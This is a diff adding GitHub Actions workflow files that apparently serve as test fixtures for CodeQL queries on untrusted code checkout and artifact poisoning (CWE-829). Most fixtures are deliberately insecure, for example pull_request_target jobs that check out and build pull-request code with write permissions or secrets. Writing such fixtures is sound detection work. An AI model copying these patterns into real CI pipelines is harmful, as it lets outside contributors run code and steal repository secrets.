a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml new file mode 100644 index 000000000000..8cb380ae0436 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning71.yml @@ -0,0 +1,18 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - name: Use artifact + run: | + sed -f config foo.md > bar.md diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml new file mode 100644 index 000000000000..768f244c210f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml @@ -0,0 +1,31 @@ +name: elevate +on: + - pull_request_target + +jobs: + job1: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - run: | + bash script.sh + - uses: actions/upload-artifact@v4 + with: + name: results + path: results + retention-days: 1 + + job2: + runs-on: ubuntu-latest + needs: job1 + permissions: + contents: write + steps: + - uses: actions/download-artifact@v3 + with: + name: results + - run: python test.py diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml new file mode 100644 index 000000000000..6ae7f482f55f --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml @@ -0,0 +1,31 @@ +name: elevate +on: + - pull_request + +jobs: + job1: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - run: | + bash script.sh + - uses: actions/upload-artifact@v4 + with: + name: results + path: results + retention-days: 1 + + job2: + runs-on: ubuntu-latest + needs: job1 + permissions: + contents: write + steps: + - uses: actions/download-artifact@v4 + with: + name: results + - run: python test.py diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml new file mode 100644 index 000000000000..af9f01b572f1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning91.yml @@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml new file mode 100644 index 000000000000..e35bc73c3bda --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning92.yml @@ -0,0 +1,29 @@ +name: SnapshotPR +on: + workflow_run: + workflows: + - ApprovalComment + types: + - completed +jobs: + snapshot: + permissions: + id-token: write + pull-requests: write + statuses: write + if: github.event.workflow_run.conclusion == 'success' + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - uses: ./.github/actions/download-artifact-2 + - id: metadata + run: | + pr_number="$(head -n 2 /tmp/artifacts/metadata.txt | tail -n 1)" + pr_commit="$(tail -n 1 /tmp/artifacts/metadata.txt)" + echo PR_COMMIT="$pr_commit" >> "$GITHUB_ENV" + echo PR_NUMBER="$pr_number" >> "$GITHUB_ENV" + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ env.PR_COMMIT }} + - uses: ./.github/actions/install-deps + - run: make snapshot diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml new file mode 100644 index 000000000000..28ffab637f03 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/auto_ci.yml @@ -0,0 +1,135 @@ +name: Python CI + +on: + push: + branches: [ master ] + pull_request_target: + branches: [ master, stable ] + +concurrency: + group: ${{ format('ci-{0}', github.head_ref && format('pr-{0}', github.event.pull_request.number) || github.sha) }} + cancel-in-progress: ${{ github.event_name == 'pull_request_target' }} + +jobs: + lint: + runs-on: ubuntu-latest + env: + min-python-version: "3.10" + + steps: + - name: Checkout repository + uses: actions/checkout@v3 + with: + fetch-depth: 0 + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Set up Python ${{ env.min-python-version }} + uses: actions/setup-python@v2 + with: + python-version: ${{ env.min-python-version }} + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip install -r requirements.txt + + - name: Lint with flake8 + run: flake8 + + - name: Check black formatting + run: black . --check + if: success() || failure() + + - name: Check isort formatting + run: isort . --check + if: success() || failure() + + - name: Check mypy formatting + run: mypy + if: success() || failure() + + test: + permissions: + # Gives the action the necessary permissions for publishing new + # comments in pull requests. + pull-requests: write + # Gives the action the necessary permissions for pushing data to the + # python-coverage-comment-action branch, and for editing existing + # comments (to avoid publishing multiple comments in the same PR) + contents: write + runs-on: ubuntu-latest + strategy: + matrix: + python-version: ["3.10"] + + steps: + - name: Check out repository + uses: actions/checkout@v3 + with: + fetch-depth: 0 + ref: ${{ github.event.pull_request.head.ref || github.event.pull_request.base.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Set up Python ${{ matrix.python-version }} + uses: actions/setup-python@v2 + with: + python-version: ${{ matrix.python-version }} + + - name: Install dependencies + run: | + python -m pip install --upgrade pip + pip install -r requirements.txt + + - name: Run unittest tests with coverage + run: | + pytest -n auto --cov=autogpt --cov-report term-missing --cov-branch --cov-report xml --cov-report term + env: + CI: true + PROXY: ${{ secrets.PROXY }} + AGENT_MODE: ${{ vars.AGENT_MODE }} + AGENT_TYPE: ${{ vars.AGENT_TYPE }} + + - name: Upload coverage reports to Codecov + uses: codecov/codecov-action@v3 + + - name: Stage new files and commit + id: stage_files + run: | + git add tests + git diff --cached --quiet && echo "No changes to commit" && exit 0 + git config user.email "github-actions@github.com" + git config user.name "GitHub Actions" + git commit -m "Add new cassettes" + TIMESTAMP_COMMIT=$(date +%Y%m%d%H%M%S) # generate a timestamp + echo "TIMESTAMP_COMMIT=TIMESTAMP_COMMIT" >> $GITHUB_ENV + + + - name: Create PR + id: create_pr + if: ${{ env.TIMESTAMP_COMMIT != null }} + uses: peter-evans/create-pull-request@v5 + with: + commit-message: Update cassettes + branch: cassette-diff-PR-${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }} + title: "Update cassette-diff-PR${{ github.event.pull_request.number }}-${{ env.TIMESTAMP_COMMIT }}" + body: "This PR updates the cassettes. Please merge it." + + + - name: Check PR + if: ${{ env.TIMESTAMP_COMMIT != null }} + run: | + echo "Pull Request Number - ${{ steps.create_pr.outputs.pull-request-number }}" + echo "Pull Request URL - ${{ steps.create_pr.outputs.pull-request-url }}" + + - name: Comment PR URL in the current PR + if: ${{ env.TIMESTAMP_COMMIT != null }} + uses: thollander/actions-comment-pull-request@v2 + with: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + message: | + Please click [HERE](${{ steps.create_pr.outputs.pull-request-url }}) and merge this PR to update the cassettes. + + - name: Fail if new PR created + if: ${{ env.TIMESTAMP_COMMIT != null }} + run: exit 1 diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml new file mode 100644 index 000000000000..afe1dfab038b --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot1.yml @@ -0,0 +1,45 @@ +name: Check dist + +on: + pull_request: + push: + branches: + - main + - 'releases/*' + +jobs: + verify-build: # make sure the checked in dist/ folder matches the output of a rebuild + runs-on: ubuntu-latest + + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - name: Read .nvmrc + id: nvm + run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: ${{ steps.nvm.outputs.NVMRC }} + + - name: Install npm dependencies + run: npm clean-install + + - name: Rebuild the dist/ directory + run: npm run package + + - name: Compare the expected and actual dist/ directories + run: script/check-diff + verify-index-js: # make sure the entrypoint js files run on a clean machine without compiling first + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: ./ + with: + milliseconds: 1000 diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml new file mode 100644 index 000000000000..072eae4b1d2a --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot2.yml @@ -0,0 +1,68 @@ +name: Compile dependabot updates + +on: + pull_request: + +permissions: + pull-requests: write + contents: write +jobs: + fetch-dependabot-metadata: + runs-on: ubuntu-latest + # We only want to check the metadata on pull_request events from Dependabot itself, + # any subsequent pushes to the PR should just skip this step so we don't go into + # a loop on commits created by the `build-dependabot-changes` job + if: ${{ github.actor == 'dependabot[bot]' }} + # Map the step output to a job output for subsequent jobs + outputs: + dependency-type: ${{ steps.dependabot-metadata.outputs.dependency-type }} + package-ecosystem: ${{ steps.dependabot-metadata.outputs.package-ecosystem }} + steps: + - name: Fetch dependabot metadata + id: dependabot-metadata + uses: dependabot/fetch-metadata@c9c4182bf1b97f5224aee3906fd373f6b61b4526 # v1.6.0 + with: + github-token: "${{ secrets.GITHUB_TOKEN }}" + build-dependabot-changes: + runs-on: ubuntu-latest + needs: [fetch-dependabot-metadata] + # We only need to build the dist/ folder if the PR relates to Docker or an npm dependency + if: needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'docker' || needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'npm_and_yarn' + steps: + # Check out using a PAT so any pushed changes will trigger checkruns + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref }} + token: ${{ secrets.DEPENDABOT_AUTOBUILD }} + + - name: Read .nvmrc + id: nvm + run: echo "NVMRC=$(cat .nvmrc)" >> $GITHUB_OUTPUT + + - name: Setup Node.js + uses: actions/setup-node@v4 + with: + node-version: ${{ steps.nvm.outputs.NVMRC }} + + - name: Install npm dependencies + run: npm clean-install + + # If we're reacting to a Docker PR, we have on extra step to refresh and check in the container manifest, + # this **must** happen before rebuilding dist/ so it uses the new version of the manifest + - name: Rebuild docker/containers.json + if: needs.fetch-dependabot-metadata.outputs.package-ecosystem == 'docker' + run: | + npm run update-container-manifest + git add docker/containers.json + + - name: Rebuild the dist/ directory + run: npm run package + + - name: Check in any change to dist/ + run: | + git add dist/ + # Specifying the full email allows the avatar to show up: https://github.com/orgs/community/discussions/26560 + git config user.name "github-actions[bot]" + git config user.email "41898282+github-actions[bot]@users.noreply.github.com" + git commit -m "[dependabot skip] Update dist/ with build changes" || exit 0 + git push diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml new file mode 100644 index 000000000000..1bda517c9a12 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/dependabot3.yml @@ -0,0 +1,52 @@ +name: Merge Dependabot PR + +on: pull_request_target + +run-name: Merge Dependabot PR ${{ github.ref_name }} + +permissions: write-all + +jobs: + merge-dependabot-pr: + runs-on: ubuntu-latest + if: github.actor == 'dependabot[bot]' + steps: + + - uses: actions/checkout@v4 + with: + show-progress: false + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-java@v4 + with: + distribution: temurin + java-version: 17 + + - name: Set Milestone to Dependabot Pull Request + id: set-milestone + run: | + if test -f pom.xml + then + CURRENT_VERSION=$(mvn help:evaluate -Dexpression="project.version" -q -DforceStdout) + else + CURRENT_VERSION=$(cat gradle.properties | sed -n '/^version=/ { s/^version=//;p }') + fi + export CANDIDATE_VERSION=${CURRENT_VERSION/-SNAPSHOT} + MILESTONE=$(gh api repos/$GITHUB_REPOSITORY/milestones --jq 'map(select(.due_on != null and (.title | startswith(env.CANDIDATE_VERSION)))) | .[0] | .title') + + if [ -z $MILESTONE ] + then + gh run cancel ${{ github.run_id }} + echo "::warning title=Cannot merge::No scheduled milestone for $CURRENT_VERSION version" + else + gh pr edit ${{ github.event.pull_request.number }} --milestone $MILESTONE + echo mergeEnabled=true >> $GITHUB_OUTPUT + fi + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + + - name: Merge Dependabot pull request + if: steps.set-milestone.outputs.mergeEnabled + run: gh pr merge ${{ github.event.pull_request.number }} --auto --rebase + env: + GH_TOKEN: ${{ secrets.GH_ACTIONS_REPO_TOKEN }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml new file mode 100644 index 000000000000..ba4a9523cfed --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/formal.yml @@ -0,0 +1,70 @@ +name: Test Formalities + +on: + workflow_call: + +jobs: + build: + name: Test Formalities + runs-on: ubuntu-latest + strategy: + fail-fast: false + + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + fetch-depth: 0 + + - name: Determine branch name + run: | + BRANCH="${GITHUB_BASE_REF#refs/heads/}" + echo "Building for $BRANCH" + echo "BRANCH=$BRANCH" >> $GITHUB_ENV + + - name: Test formalities + run: | + source .github/workflows/scripts/ci_helpers.sh + + RET=0 + for commit in $(git rev-list HEAD ^origin/$BRANCH); do + info "=== Checking commit '$commit'" + if git show --format='%P' -s $commit | grep -qF ' '; then + err "Pull request should not include merge commits" + RET=1 + fi + + author="$(git show -s --format=%aN $commit)" + if echo $author | grep -q '\S\+\s\+\S\+'; then + success "Author name ($author) seems ok" + else + err "Author name ($author) need to be your real name 'firstname lastname'" + RET=1 + fi + + subject="$(git show -s --format=%s $commit)" + if echo "$subject" | grep -q -e '^[0-9A-Za-z,+/_\.-]\+: ' -e '^Revert '; then + success "Commit subject line seems ok ($subject)" + else + err "Commit subject line MUST start with ': ' ($subject)" + RET=1 + fi + + body="$(git show -s --format=%b $commit)" + sob="$(git show -s --format='Signed-off-by: %aN <%aE>' $commit)" + if echo "$body" | grep -qF "$sob"; then + success "Signed-off-by match author" + else + err "Signed-off-by is missing or doesn't match author (should be '$sob')" + RET=1 + fi + + if echo "$body" | grep -v "Signed-off-by:"; then + success "A commit message exists" + else + err "Missing commit message. Please describe your changes" + RET=1 + fi + done + + exit $RET diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml new file mode 100644 index 000000000000..3b8a6d6dd62a --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable.yml @@ -0,0 +1,29 @@ +name: Test + +on: + workflow_call: + inputs: + branch: + type: string + default: "**" + +defaults: + run: + shell: bash + +jobs: + test: + name: Checkout + runs-on: ubuntu-latest + + permissions: + contents: write + pull-requests: write + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ inputs.branch }} + - run: | + npm install + npm run lint + diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml new file mode 100644 index 000000000000..c91b68f6b875 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/formal.yml @@ -0,0 +1,12 @@ +name: Test Formalities + +on: + pull_request: + +permissions: + contents: read + +jobs: + build: + name: Test Formalities + uses: TestOrg/TestRepo/.github/workflows/formal.yml@main diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml new file mode 100644 index 000000000000..ab121239c6e1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/gitcheckout.yml @@ -0,0 +1,23 @@ +on: + pull_request_target + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + # 1. Check out the content from an incoming pull request + - run: | + git fetch origin $HEAD_BRANCH + git checkout origin/master + git config user.name "release-hash-check" + git config user.email "<>" + git merge --no-commit --no-edit origin/$HEAD_BRANCH + env: + HEAD_BRANCH: ${{ github.head_ref }} + - uses: actions/setup-node@v1 + # 2. Potentially untrusted commands are being run during "npm install" or "npm build" as + # the build scripts and referenced packages are controlled by the author of the pull request + - run: | + npm install + npm build diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml new file mode 100644 index 000000000000..221854ec2042 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_3rd_party_action.yml @@ -0,0 +1,52 @@ +name: PR head from 3rd party action + +on: + workflow_call: + workflow_dispatch: + +jobs: + + test1: + runs-on: ubuntu-20.04 + steps: + - name: (PR comment) Get PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + - name: (PR comment) Checkout PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + test2: + runs-on: ubuntu-20.04 + steps: + - name: (PR comment) Get PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - name: (PR comment) Checkout PR branch + if: ${{ github.event_name == 'issue_comment' }} + uses: actions/checkout@v3 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + test3: + runs-on: ubuntu-20.04 + steps: + - name: resolve pr refs + id: refs + uses: eficode/resolve-pr-refs@main + with: + token: ${{ secrets.GITHUB_TOKEN }} + + - uses: actions/checkout@v4 + with: + ref: ${{ steps.refs.outputs.head_ref }} + fetch-depth: 0 + - uses: actions/checkout@v4 + with: + ref: ${{ steps.refs.outputs.head_sha }} + fetch-depth: 0 diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml new file mode 100644 index 000000000000..ece4c02c3565 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_direct.yml @@ -0,0 +1,46 @@ +name: Direct access + +on: + issue_comment: + types: [created] + +jobs: + test1: + runs-on: ubuntu-latest + if: github.event_name == 'issue_comment' && github.event.issue.pull_request + steps: + - name: Unsafe Code Checkout + uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.ref || github.head_ref }} # Checkout the branch that made the PR or the comment's PR branch + test2: + runs-on: ubuntu-latest + if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' + steps: + - uses: actions/checkout@v4 + with: + ref: refs/pull/${{ github.event.issue.number }}/merge + + test3: + runs-on: ubuntu-latest + if: github.event.issue.pull_request && github.event.comment.body == '/trigger release' + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ format('refs/pull/{0}/merge', github.event.issue.number) }} + + test4: + runs-on: ubuntu-latest + steps: + - name: Checkout Branch + uses: actions/checkout@v4 + with: + ref: ${{ (github.event_name == 'pull_request_review_comment') && format('refs/pull/{0}/merge', github.event.pull_request.number) || '' }} + + test5: + runs-on: ubuntu-latest + steps: + - name: Checkout Branch + uses: actions/checkout@v4 + with: + ref: ${{ github.event_name == 'issue_comment' && format('refs/pull/{0}/merge', github.event.issue.number) || '' }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml new file mode 100644 index 000000000000..8c0865f598cd --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_heuristic.yml @@ -0,0 +1,50 @@ +name: Heuristic based + +on: + issue_comment: + types: [created] + +jobs: + test1: + runs-on: ubuntu-latest + steps: + - name: Get Info from comment + uses: actions/github-script@v7 + id: get-pr-info + with: + script: | + const request = { + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: ${{ github.event.issue.number }}, + } + core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`) + const pr = await github.rest.pulls.get(request); + return pr.data; + - name: Debug + id: get-sha + run: | + echo "sha=${{ fromJSON(steps.get-pr-info.outputs.result).head.sha }}" >> $GITHUB_OUTPUT + - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} : ${{steps.get-sha.outputs.sha}} )" + uses: actions/checkout@v4 + with: + ref: ${{ steps.get-sha.outputs.sha }} + + test2: + runs-on: ubuntu-latest + + steps: + - name: Detect branch for PR + id: vars + run: | + PR=$( echo "${{ github.event.comment.issue_url }}" | grep -oE 'issues/([0-9]+)$' | cut -d'/' -f 2 ) + PR_INFO=$( curl \ + --request GET \ + --header 'authorization: Bearer ${{ secrets.GITHUB_TOKEN }}' \ + --header 'content-type: application/json' \ + --url https://api.github.com/repos/$GITHUB_REPOSITORY/pulls/$PR ) + REF=$(echo "${PR_INFO}" | jq -r .head.ref) + echo "branch=$REF" >> $GITHUB_OUTPUT + - uses: actions/checkout@v4 + with: + ref: ${{ steps.vars.outputs.branch }} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml new file mode 100644 index 000000000000..1245d0302fb4 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit.yml @@ -0,0 +1,114 @@ +name: Octokit (heuristics) + +on: + issue_comment: + types: [created] + +jobs: + test1: + if: github.event.comment.body == '@metabase-bot run visual tests' + runs-on: ubuntu-22.04 + steps: + - name: Fetch issue + uses: octokit/request-action@v2.x + id: fetch_issue + with: + route: GET ${{ github.event.issue.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Fetch PR + uses: octokit/request-action@v2.x + id: fetch_pr + with: + route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - uses: actions/checkout@v4 + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} + token: ${{ secrets.GITHUB_TOKEN }} + - uses: actions/checkout@v4 + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.sha }} + token: ${{ secrets.GITHUB_TOKEN }} + + test2: + runs-on: ubuntu-latest + steps: + - name: Get Info from comment + uses: actions/github-script@v7 + id: get-pr-info + with: + script: | + const request = { + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: ${{ github.event.issue.number }}, + } + core.info(`Getting PR #${request.pull_number} from ${request.owner}/${request.repo}`) + const pr = await github.rest.pulls.get(request); + return pr.data; + + - name: Debug + id: get-sha + run: | + echo "sha=${{ fromJSON(steps.get-pr-info.outputs.result).head.sha }}" >> $GITHUB_OUTPUT + + - name: "Checkout ${{ github.ref }} ( ${{ github.sha }} : ${{steps.get-sha.outputs.sha}} )" + uses: actions/checkout@v4 + with: + ref: ${{ steps.get-sha.outputs.sha }} + + test3: + if: github.event.comment.body == '@excalibot trigger release' && github.event.issue.pull_request + runs-on: ubuntu-latest + steps: + - name: Get PR SHA + id: sha + uses: actions/github-script@v4 + with: + result-encoding: string + script: | + const { owner, repo, number } = context.issue; + const pr = await github.pulls.get({ + owner, + repo, + pull_number: number, + }); + return pr.data.head.sha + - uses: actions/checkout@v2 + with: + ref: ${{ steps.sha.outputs.result }} + + test4: + if: github.event.issue.pull_request && contains(github.event.comment.body, '!bench_parser') + runs-on: ubuntu-latest + steps: + - name: Get PR SHA + id: sha + uses: actions/github-script@v6 + with: + result-encoding: string + script: | + const response = await github.request(context.payload.issue.pull_request.url); + return response.data.head.sha; + - name: Checkout PR Branch + uses: actions/checkout@v3 + with: + ref: ${{ steps.sha.outputs.result }} + + test5: + runs-on: ubuntu-20.04 + steps: + - id: request + uses: octokit/request-action@v2.0.2 + with: + route: ${{ github.event.issue.pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Checkout PR Branch + uses: actions/checkout@v3 + with: + token: ${{ secrets.GITHUB_TOKEN }} + repository: ${{fromJson(steps.request.outputs.data).head.repo.full_name}} + ref: ${{fromJson(steps.request.outputs.data).head.ref}} diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml new file mode 100644 index 000000000000..84081fef5d06 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/issue_comment_octokit2.yml @@ -0,0 +1,38 @@ +name: Octokit (heuristics) + +on: + issue_comment: + types: [created] + +jobs: + test1: + if: github.event.comment.body == '@metabase-bot run visual tests' + runs-on: ubuntu-22.04 + steps: + - name: Fetch issue + uses: octokit/request-action@v2.x + id: fetch_issue + with: + route: GET ${{ github.event.issue.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Fetch PR minor and patch wildcard + uses: octokit/request-action@v2.x.x + id: fetch_pr + with: + route: GET ${{ fromJson(steps.fetch_issue.outputs.data).pull_request.url }} + env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + - name: Checkout PR minor patch wildcard + - uses: actions/checkout@v2.x.xx + with: + ref: ${{ fromJson(steps.fetch_pr.outputs.data).head.ref }} + token: ${{ secrets.GITHUB_TOKEN }} + - name: Checkout PR minor wildcard incomplete patch + uses: actions/checkout@v2.x. + - name: Run latest action + uses: some-action/some-repo@latest + with: + some-input: some-value + - name: run the latest checkout action + uses: actions/checkout@latest \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml new file mode 100644 index 000000000000..56bb143cf367 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml @@ -0,0 +1,27 @@ +on: + pull_request_target: + types: [labeled] + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + if: contains(github.event.pull_request.labels.*.name, 'safe to test') + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml new file mode 100644 index 000000000000..6014d08ed806 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml @@ -0,0 +1,28 @@ +on: + pull_request_target: + types: [labeled] + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + if: | + !contains(github.event.pull_request.labels.*.name, 'safe to test') + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml new file mode 100644 index 000000000000..49908b7b4c51 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/level0.yml @@ -0,0 +1,136 @@ +name: Poutine Level 0 +on: + issues: + types: [opened, edited] + issue_comment: + types: [created, edited] + pull_request_target: + types: [opened, synchronize] + branches: + - main + pull_request: + types: [closed] + branches: + - main + +permissions: {} + +concurrency: + group: ${{ github.workflow }} + cancel-in-progress: false + +jobs: + fries: + runs-on: ubuntu-latest + timeout-minutes: 1 + if: github.event_name == 'issues' + permissions: + id-token: 